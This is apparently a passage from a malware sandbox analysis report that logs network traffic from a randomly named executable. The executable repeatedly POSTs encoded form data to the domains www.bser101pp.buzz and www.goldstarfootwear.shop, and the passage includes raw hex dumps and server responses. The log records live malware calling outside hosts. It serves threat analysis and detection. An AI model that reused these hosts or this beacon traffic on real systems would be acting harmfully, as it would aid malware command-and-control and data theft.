                                                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.449863104.21.58.90803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:51.127619028 CET647OUTPOST /v89f/ HTTP/1.1
                                                                                                                          Host: www.bser101pp.buzz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bser101pp.buzz
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 4c 51 30 68 41 37 69 35 78 48 32 44 65 7a 34 4c 44 57 77 41 30 39 71 52 30 53 54 7a 52 4e 6d 57 41 73 57 35 59 55 77 43 4e 48 32 49 6f 37 74 42 33 41 4f 6e 54 75 55 58 36 67 47 35 4c 75 39 75 4b 59 48 44 64 45 71 67 43 63 63 59 6f 63 65 71 69 5a 33 71 6e 33 6f 44 2f 49 43 72 76 67 50 35 6f 37 62 41 31 64 75 51 56 4c 66 4f 64 63 50 78 55 6c 2b 6c 47 53 32 46 4d 41 68 4f 44 77 67 33 6d 4f 63 64 66 54 48 67 6a 44 61 36 59 31 55 75 7a 77 42 6d 6f 30 69 4e 48 70 74 30 57 4b 62 71 59 75 2f 53 54 32 66 67 57 38 50 68 41 3d
                                                                                                                          Data Ascii: Mr60=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6Y1UuzwBmo0iNHpt0WKbqYu/ST2fgW8PhA=
                                                                                                                          Nov 22, 2024 15:12:52.362478018 CET945INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:52 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpjdmCjOtmi6O3l0NAvsmt3hhYhEz2dVfeKcounSOmSSQ4RMyKOrF0TnN3SVZBXzuMXlYKVqDBkRocx0A3RrCvoO0FsWvzxbOBi8ExrY494jRvCgF2%2BqW0rwDKuE7DEduOkF5sw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e6984517b38430a-EWR
                                                                                                                          Content-Encoding: gzip
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1673&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=647&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.449871104.21.58.90803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:53.785161018 CET10729OUTPOST /v89f/ HTTP/1.1
                                                                                                                          Host: www.bser101pp.buzz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bser101pp.buzz
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bser101pp.buzz/v89f/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 54 51 30 54 49 37 34 61 5a 48 33 44 65 7a 31 72 44 56 77 41 30 67 71 56 59 73 54 7a 56 64 6d 55 34 73 58 63 4d 55 67 67 31 48 34 49 6f 37 77 78 33 42 54 33 53 73 55 58 71 73 47 35 62 75 39 75 4b 59 48 46 78 45 70 31 2b 63 62 6f 6f 66 5a 71 69 64 67 36 6e 54 6f 44 57 7a 43 71 62 65 50 4a 49 37 61 67 6c 64 31 46 68 4c 44 65 64 53 4b 78 56 69 2b 6c 61 4e 32 46 51 4d 68 4f 47 66 67 77 57 4f 66 64 53 57 43 53 58 49 5a 36 42 6d 58 63 4c 34 48 6d 45 32 6c 2f 72 78 68 56 4b 7a 49 4f 73 6e 2f 43 54 38 50 6a 44 33 63 30 36 6b 53 75 41 6e 66 42 2b 4d 2f 6a 72 42 46 4b 65 4c 34 4a 69 51 69 74 50 4c 48 35 4b 79 30 75 79 6e 45 61 71 43 38 47 45 77 38 64 47 43 30 6b 49 39 62 76 66 62 58 36 42 66 55 30 55 6b 61 52 51 69 76 4c 46 67 5a 4d 39 41 71 49 75 44 35 31 2b 77 6a 32 61 67 49 44 48 68 74 39 6c 36 72 52 4d 41 53 66 33 46 46 73 35 79 43 46 55 61 6d 61 48 50 32 73 58 61 48 [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uTQ0TI74aZH3Dez1rDVwA0gqVYsTzVdmU4sXcMUgg1H4Io7wx3BT3SsUXqsG5bu9uKYHFxEp1+cboofZqidg6nToDWzCqbePJI7agld1FhLDedSKxVi+laN2FQMhOGfgwWOfdSWCSXIZ6BmXcL4HmE2l/rxhVKzIOsn/CT8PjD3c06kSuAnfB+M/jrBFKeL4JiQitPLH5Ky0uynEaqC8GEw8dGC0kI9bvfbX6BfU0UkaRQivLFgZM9AqIuD51+wj2agIDHht9l6rRMASf3FFs5yCFUamaHP2sXaHLeRae+zRChIJno0HmjbzpNR7YjX28M2XjgXsZih4FR6myiwpuzX+oixQg2ny3clWSZOkwtYx+TmwiYJ/GczLTZuW5esUNoEtGfjbKdku7QaRysAUIq4rGmuR/QIbmMoEvmjwh2oEZpGgm4dyzAARAQs6/FoLga9CYNFkV1TMGz5bMhyF1WX5urrRKLeVZ6lGgKZLBPPTIuJVCHA33K8v2lOuLIpex9I6tZHEdCTUX3NG+bGOgZUl7gI08U/YmW3MOCDlOYwtUKYkDhVnUekAa/3HZBZilO8UgfdUX3Y1K9TFu5t0VQc3W+0+3azqqpVf7PEtvnlzPvQXVAU5rmUlJ1Ci7+xWYKz+Y4nxEHl+DXGnSW6tqy2QbtrC2hc3AdEY6BmNCZ8tbUNQ7DZGS0mRZf6UJavZ2FbCMl4Myh58TO9QQJdSFoUIDVrdTTocyCaDtfMCaTKOkmFohhoQ54odLvolvA8/2mQEN1dQiYASzLiFe6HuWQZ+kDNBQSAnEwxMHzAesCczhtEI/UudBN6omXWc2ifE74dUHri8MIvVjrybt5hsZTfdS4kExwfV8kEMXEx3ojGNoTffje0V2o0r7uGleSOtulz5993Q6BRKLYcNQFFhLfV2DM9Zm2mnM+fP8Pn6xnN0GGg7TQyXyhrphhProcEwxg2HAF [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:12:54.955177069 CET952INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:54 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmtaxxdIQAoErVBf8Vv23IYJkyG3KpEmmy8ShcQPICxBhZg6q1BxTEvPZjCQeECByRY0SNqMPMXvy%2Fl7t4lF0OfeSjj6iTlokc%2FDlM5rhcLTQgjYrP2icGzDmry51CqdZAcyg%2FI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e698461d8568cee-EWR
                                                                                                                          Content-Encoding: gzip
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1831&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10729&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.449879104.21.58.90803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:12:56.517148018 CET357OUTGET /v89f/?Mr60=vR3kWP+v98PFeIQUj3bnjAJ1ckGUCiAryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2Lg1hTzUbXWqWgu/JIX+7IudMx93vwrkJY0=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.bser101pp.buzz
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:12:57.712625027 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:12:57 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmDkL9SZCD6P9Ur0Wxy5m2bP4Tp6Z517UhkhobWGiH%2B9Ivi19wVPnqdfrLFsLn3cNwlW72O527HKjJlMmA8DfxFDyn19%2FqHuOv0Ck6nOglP8VsQdKIg4gFX560qnFPtDx6BJ1Xw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e6984730f1f41ad-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11291&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=357&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->...
                                                                                                                          Nov 22, 2024 15:12:57.712666035 CET65INData Raw: 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a
                                                                                                                          Data Ascii: a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                          Nov 22, 2024 15:12:57.712982893 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.4498933.33.130.190803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:03.368961096 CET648OUTPOST /8m07/ HTTP/1.1
                                                                                                                          Host: www.goldstarfootwear.shop
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.goldstarfootwear.shop
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 70 6a 46 4e 78 44 50 73 76 71 2f 54 74 6e 2f 76 71 58 52 64 72 6b 33 52 50 4b 4e 49 58 73 6c 44 6f 70 6c 67 5a 73 36 55 59 44 35 6a 6c 31 5a 31 51 50 63 2b 7a 77 5a 4d 38 37 34 41 52 77 76 77 74 4d 4d 48 54 72 2f 61 51 49 50 6d 38 62 56 6c 5a 31 31 4e 45 2b 33 4d 43 33 51 4d 7a 44 66 6b 45 5a 65 57 44 77 75 36 62 54 36 4c 35 49 30 4e 36 6a 6c 66 68 55 68 6f 62 43 74 32 78 67 32 67 4f 79 58 6c 56 74 47 6f 62 52 48 4d 30 4f 4c 79 6c 51 41 2f 69 75 49 44 4d 4c 2b 77 4d 73 79 68 41 6e 57 37 34 71 35 4a 49 6a 65 6f 39 64 6d 6e 77 45 73 51 64 41 3d 3d
                                                                                                                          Data Ascii: Mr60=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/iuIDML+wMsyhAnW74q5JIjeo9dmnwEsQdA==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.4499023.33.130.190803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:06.038191080 CET668OUTPOST /8m07/ HTTP/1.1
                                                                                                                          Host: www.goldstarfootwear.shop
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.goldstarfootwear.shop
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 52 44 6f 49 56 67 66 64 36 55 49 54 35 6a 74 56 5a 77 55 50 63 44 7a 77 64 79 38 36 45 41 52 77 72 77 74 4e 38 48 54 34 48 56 51 59 50 6b 30 37 56 6e 57 56 31 4e 45 2b 33 4d 43 33 46 70 7a 44 48 6b 45 70 75 57 43 56 4f 35 57 7a 36 4b 6f 49 30 4e 70 7a 6c 54 68 55 67 4e 62 44 77 6a 78 6d 36 67 4f 7a 6e 6c 4d 63 47 72 56 68 48 43 33 2b 4b 64 75 46 68 6f 6b 50 45 58 55 6f 71 72 42 34 47 61 49 42 62 68 70 62 59 65 61 6a 36 62 67 61 76 54 39 48 52 5a 47 4c 34 30 5a 77 31 51 4d 45 33 6b 41 6a 51 45 4a 54 46 71 39 79 63 3d
                                                                                                                          Data Ascii: Mr60=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeaj6bgavT9HRZGL40Zw1QME3kAjQEJTFq9yc=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.4499083.33.130.190803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:08.709234953 CET10750OUTPOST /8m07/ HTTP/1.1
                                                                                                                          Host: www.goldstarfootwear.shop
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.goldstarfootwear.shop
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.goldstarfootwear.shop/8m07/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 37 66 76 6f 72 36 61 2b 78 64 2b 35 76 44 56 4e 7a 6b 37 73 37 36 2f 63 78 58 2f 76 6a 33 52 42 72 6b 37 52 50 4f 55 54 58 65 4a 44 6f 61 4e 67 63 2b 53 55 61 44 35 6a 6a 31 5a 78 55 50 63 53 7a 77 6c 32 38 36 49 71 52 79 44 77 74 76 45 48 47 35 48 56 65 59 50 6b 34 62 56 6d 5a 31 31 59 45 39 4f 46 43 33 56 70 7a 44 48 6b 45 71 32 57 4c 67 75 35 46 6a 36 4c 35 49 30 6f 36 6a 6b 47 68 51 4e 77 62 44 6c 59 78 57 61 67 4f 51 66 6c 4f 4f 65 72 54 78 48 41 2b 75 4b 46 75 46 6b 76 6b 4c 6c 35 55 70 75 56 42 2f 75 61 4b 6b 79 68 72 71 30 44 48 69 36 63 37 62 48 74 7a 6d 59 66 4b 35 63 36 57 7a 77 4a 5a 77 37 39 41 6b 6f 49 63 44 46 2b 76 69 71 79 7a 2f 44 62 58 44 30 52 72 36 6f 69 31 54 77 30 37 6e 72 6f 2f 30 6f 58 69 6f 6e 4e 42 39 51 41 69 4f 51 67 75 43 46 2f 54 4b 4b 4b 57 44 41 37 55 6c 4e 68 44 44 47 4d 71 55 6b 51 68 64 30 52 53 45 33 6b 59 70 31 63 6c 72 67 71 48 45 53 61 77 42 36 4d 78 47 2b 48 63 78 49 50 55 43 4f 41 4d 55 59 6d 59 53 44 66 78 52 2b 39 75 72 58 75 30 65 4a 33 67 [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeJDoaNgc+SUaD5jj1ZxUPcSzwl286IqRyDwtvEHG5HVeYPk4bVmZ11YE9OFC3VpzDHkEq2WLgu5Fj6L5I0o6jkGhQNwbDlYxWagOQflOOerTxHA+uKFuFkvkLl5UpuVB/uaKkyhrq0DHi6c7bHtzmYfK5c6WzwJZw79AkoIcDF+viqyz/DbXD0Rr6oi1Tw07nro/0oXionNB9QAiOQguCF/TKKKWDA7UlNhDDGMqUkQhd0RSE3kYp1clrgqHESawB6MxG+HcxIPUCOAMUYmYSDfxR+9urXu0eJ3gy7myY6CgBKMv2hdMUt3SmpkR7v5sKOuJtzMcq+RN9733bkpGFVAD2IbuaeVcSMyxrOH3H3k2ytB9nz38jjNn27NZJeaL6+Qsmw4SJQ4u4FIyQDBI2ktNDFy+Vl8DE+HBNZU3ibP+yFFUjBJ+5lcWf9B4L/LNxVQPvG4WCrKNREIO+4ol5XWUhLm3NFBpXTjJZ3pbkNmToVFDzR56PM/cklZhSsZVtpl9uLWocUOv7ljl8phqBPsZs2ON2RpLo+83H5DqRbNKK9fRzxvxU0R+PHpYUCqKZHWr1t59GFg6ciOBrvNjb4imY/8jYAjZ1PZwfyKrzklSvUu2zqxmseB59HtGNlBFBWk2Aly3Wr7eJdFATEpuz/PdBMjIqBJ8N+x5kpZknztPUfkKWbf1cuyo3Ik8yfuhX5EtrW9GW3BvinQWt7cLjaens/HsBjfcEaEU8GWmz7bavefBvQhQ3QrF1/fG5e8mauBKH/dfDHIazT5cvRLe+fzWaS0fK4FepjaIu+zCo94p3seItf8WJ1iqwJXdWFQRTA+erhXrYoSXx29wfkjYGUwD3wzs5AFT/tb4tYfzpsI1eama66Vrm+LQjfoeQje68Pt+08LYSaG0D0a+EcS7l3XeZVsbGVvVLJWsb1k78+qDEH9mgHqI6uFKyfptSGnaY6KvNe [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.4499143.33.130.190803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:11.377552986 CET364OUTGET /8m07/?o6=SpTPojpx7H&Mr60=2dHIoPS/8uSmn0UTpxXBmuXgzQfGtnFv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrQZLN2Jh+RnltKoXALFEyxyCbEquQJUaCWgU= HTTP/1.1
                                                                                                                          Host: www.goldstarfootwear.shop
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:13:12.517416954 CET394INHTTP/1.1 200 OK
                                                                                                                          Server: openresty
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:12 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 254
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 36 3d 53 70 54 50 6f 6a 70 78 37 48 26 4d 72 36 30 3d 32 64 48 49 6f 50 53 2f 38 75 53 6d 6e 30 55 54 70 78 58 42 6d 75 58 67 7a 51 66 47 74 6e 46 76 33 6c 58 70 47 2b 5a 37 5a 66 52 33 2f 72 31 4d 41 36 79 66 61 53 45 75 75 58 31 67 63 50 74 75 30 48 70 6c 78 4b 55 48 42 77 2b 53 72 4f 51 4b 4d 4a 72 72 51 5a 4c 4e 32 4a 68 2b 52 6e 6c 74 4b 6f 58 41 4c 46 45 79 78 79 43 62 45 71 75 51 4a 55 61 43 57 67 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?o6=SpTPojpx7H&Mr60=2dHIoPS/8uSmn0UTpxXBmuXgzQfGtnFv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrQZLN2Jh+RnltKoXALFEyxyCbEquQJUaCWgU="}</script></head></html>


